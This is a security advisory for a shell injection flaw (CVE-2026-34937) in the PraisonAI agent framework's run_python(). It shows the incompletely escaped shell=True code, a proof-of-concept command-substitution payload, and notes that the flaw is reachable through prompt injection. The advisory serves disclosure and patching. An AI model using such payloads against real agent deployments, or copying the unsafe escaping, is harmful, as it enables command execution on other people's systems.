GHSA-w37c-qqfp-c67f
Suggest an improvement- Source
- https://github.com/advisories/GHSA-w37c-qqfp-c67f
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-w37c-qqfp-c67f/GHSA-w37c-qqfp-c67f.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-w37c-qqfp-c67f
- Aliases
-
- CVE-2026-34937
- Published
- 2026-04-01T23:18:17Z
- Modified
- 2026-04-02T13:34:21.512973Z
- Severity
-
- 7.8 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- Summary
- PraisonAI: Shell Injection in run_python() via Unescaped $() Substitution
- Details
-
Summary
run_python()inpraisonaiconstructs a shell command string by interpolating user-controlled code intopython3 -c "<code>"and passing it tosubprocess.run(..., shell=True). The escaping logic only handles\and", leaving$()and backtick substitutions unescaped, allowing arbitrary OS command execution before Python is invoked.Details
execute_command.py:290(source) ->execute_command.py:297(hop) ->execute_command.py:310(sink)# source -- user-controlled code argument def run_python(code: str, cwd=None, timeout=60): # hop -- incomplete escaping, $ and () not handled escaped_code = code.replace('\\', '\\\\').replace('"', '\\"') command = f'{python_cmd} -c "{escaped_code}"' # sink -- shell=True expands $() before python3 runs return execute_command(command=command, cwd=cwd, timeout=timeout) # execute_command calls subprocess.run(command, shell=True, ...)PoC
# tested on: praisonai==0.0.81 (source install, commit HEAD 2026-03-30) # install: pip install -e src/praisonai import sys sys.path.insert(0, 'src/praisonai') from praisonai.code.tools.execute_command import run_python result = run_python(code='$(id > /tmp/injected)') print(result) # verify import subprocess print(subprocess.run(['cat', '/tmp/injected'], capture_output=True, text=True).stdout) # expected output: uid=1000(narey) gid=1000(narey) groups=1000(narey)...Impact
Any agent pipeline or API consumer that passes user or task-supplied content to
run_python()is exposed to full OS command execution as the process user. The function is reachable via indirect prompt injection and the auto-generated Flask server deploys withAUTH_ENABLED = Falseby default when no token is configured. - Database specific
{ "github_reviewed": true, "github_reviewed_at": "2026-04-01T23:18:17Z", "severity": "HIGH", "nvd_published_at": null, "cwe_ids": [ "CWE-78" ] }- References
Affected packages
PyPI / praisonaiagents
Package
- Name
- praisonaiagents
- View open source insights on deps.dev
- Purl
- pkg:pypi/praisonaiagents
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed1.5.90
Affected versions
0.*
0.0.1
0.0.2
0.0.3
0.0.4
0.0.5
0.0.6
0.0.7
0.0.8
0.0.9
0.0.10
0.0.11
0.0.12
0.0.13
0.0.14
0.0.15
0.0.16
0.0.17
0.0.18
0.0.19
0.0.20
0.0.21
0.0.22
0.0.23
0.0.24
0.0.25
0.0.26
0.0.27
0.0.28
0.0.29
0.0.30
0.0.31
0.0.32
0.0.33
0.0.34
0.0.35
0.0.36
0.0.37
0.0.38
0.0.39
0.0.40
0.0.41
0.0.42
0.0.43
0.0.44
0.0.45
0.0.46
0.0.47
0.0.48
0.0.49
0.0.50
0.0.51
0.0.52
0.0.53
0.0.54
0.0.56
0.0.57
0.0.58
0.0.59
0.0.60
0.0.61
0.0.62
0.0.63
0.0.64
0.0.65
0.0.66
0.0.67
0.0.68
0.0.69
0.0.70
0.0.71
0.0.72
0.0.73
0.0.74
0.0.75
0.0.76
0.0.77
0.0.78
0.0.79
0.0.80
0.0.81
0.0.82
0.0.83
0.0.84
0.0.85
0.0.86
0.0.87
0.0.88
0.0.89
0.0.90
0.0.91
0.0.92
0.0.93
0.0.94
0.0.95
0.0.96
0.0.97
0.0.98
0.0.99
0.0.100
0.0.101
0.0.102
0.0.103
0.0.104
0.0.105
0.0.106
0.0.107
0.0.108
0.0.109
0.0.110
0.0.111
0.0.112
0.0.113
0.0.114
0.0.115
0.0.116
0.0.117
0.0.118
0.0.119
0.0.120
0.0.121
0.0.122
0.0.123
0.0.124
0.0.125
0.0.126
0.0.127
0.0.128
0.0.129
0.0.130
0.0.131
0.0.132
0.0.133
0.0.134
0.0.135
0.0.136
0.0.137
0.0.138
0.0.139
0.0.140
0.0.141
0.0.142
0.0.143
0.0.144
0.0.145
0.0.146
0.0.147
0.0.148
0.0.149
0.0.150
0.0.151
0.0.152
0.0.153
0.0.154
0.0.155
0.0.156
0.0.157
0.0.158
0.0.159
0.0.160
0.0.161
0.0.162
0.0.163
0.0.164
0.0.165
0.0.166
0.0.167
0.0.168
0.0.169
0.0.170
0.0.171
0.0.172
0.0.173
0.0.174
0.0.175
0.0.176
0.0.177
0.0.178
0.0.179
0.0.180
0.0.181
0.0.182
0.0.183
0.0.184
0.0.185
0.0.187
0.0.188
0.0.189
0.0.190
0.0.191
0.0.192
0.0.193
0.0.194
0.0.195
0.0.196
0.0.197
0.0.198
0.0.199
0.1.0
0.1.1
0.1.2
0.1.3
0.1.4
0.1.5
0.1.6
0.1.7
0.1.8
0.1.9
0.1.10
0.1.11
0.1.12
0.1.13
0.1.14
0.1.15
0.1.16
0.1.17
0.1.18
0.1.19
0.1.20
0.1.21
0.1.22
0.1.23
0.1.24
0.1.25
0.1.26
0.1.27
0.2.0
0.2.1
0.2.2
0.3.0
0.3.1
0.3.2
0.3.3
0.3.4
0.4.0
0.4.1
0.5.0
0.5.1
0.5.2
0.5.3
0.6.0
0.6.1
0.6.2
0.6.3
0.6.4
0.6.5
0.6.6
0.6.7
0.6.8
0.7.0
0.7.1
0.8.0
0.8.1
0.9.0
0.9.1
0.10.0
0.10.1
0.10.2
0.10.3
0.10.4
0.10.5
0.10.6
0.10.7
0.10.8
0.10.9
0.10.10
0.11.0
0.11.1
0.11.2
0.11.3
0.11.4
0.11.5
0.11.6
0.11.7
0.11.8
0.11.9
0.11.10
0.11.11
0.11.12
0.11.13
0.11.14
0.11.15
0.11.16
0.11.17
0.11.18
0.11.19
0.11.20
0.11.21
0.11.22
0.11.23
0.11.24
0.11.25
0.11.27
0.11.28
0.11.29
0.11.30
0.11.31
0.12.0
0.12.1
0.12.2
0.12.3
0.12.4
0.12.5
0.12.6
0.12.7
0.12.8
0.12.9
0.12.10
0.12.11
0.12.12
0.12.13
0.12.14
0.12.15
0.12.16
0.12.17
0.12.18
0.12.19
0.12.20
0.12.21
0.13.0
0.13.1
0.13.2
0.13.3
0.13.4
0.13.5
0.13.6
0.13.7
0.13.8
0.13.9
0.13.10
0.13.11
0.13.12
0.13.13
0.13.14
0.13.15
0.13.16
0.13.17
0.13.18
0.13.19
0.13.20
0.13.21
0.13.22
0.13.23
0.14.0
0.14.1
0.14.2
0.14.3
0.14.4
0.14.5
0.14.6
0.14.7
0.14.8
0.14.9
0.14.10
0.14.11
0.14.12
0.14.14
0.14.15
0.14.16
0.15.0
0.15.1
0.15.2
0.15.3
1.*
1.0.0
1.1.0
1.2.0
1.2.1
1.2.2
1.2.3
1.2.4
1.3.0
1.3.1
1.4.0
1.4.1
1.4.2
1.4.3
1.4.4
1.4.5
1.4.6
1.4.7
1.4.8
1.5.0
1.5.1
1.5.2
1.5.3
1.5.5
1.5.6
1.5.7
1.5.8
1.5.9
1.5.10
1.5.11
1.5.12
1.5.13
1.5.14
1.5.15
1.5.16
1.5.17
1.5.18
1.5.19
1.5.20
1.5.21
1.5.22
1.5.23
1.5.24
1.5.25
1.5.26
1.5.27
1.5.28
1.5.29
1.5.30
1.5.31
1.5.32
1.5.33
1.5.34
1.5.35
1.5.36
1.5.37
1.5.38
1.5.39
1.5.40
1.5.41
1.5.42
1.5.43
1.5.44
1.5.45
1.5.46
1.5.47
1.5.48
1.5.49
1.5.50
1.5.51
1.5.52
1.5.53
1.5.54
1.5.55
1.5.56
1.5.57
1.5.58
1.5.59
1.5.60
1.5.61
1.5.62
1.5.63
1.5.64
1.5.65
1.5.66
1.5.67
1.5.68
1.5.69
1.5.70
1.5.71
1.5.72
1.5.73
1.5.74
1.5.75
1.5.76
1.5.77
1.5.78
1.5.79
1.5.80
1.5.81
1.5.82
1.5.83
1.5.84
1.5.85
1.5.86
1.5.87
1.5.88
1.5.89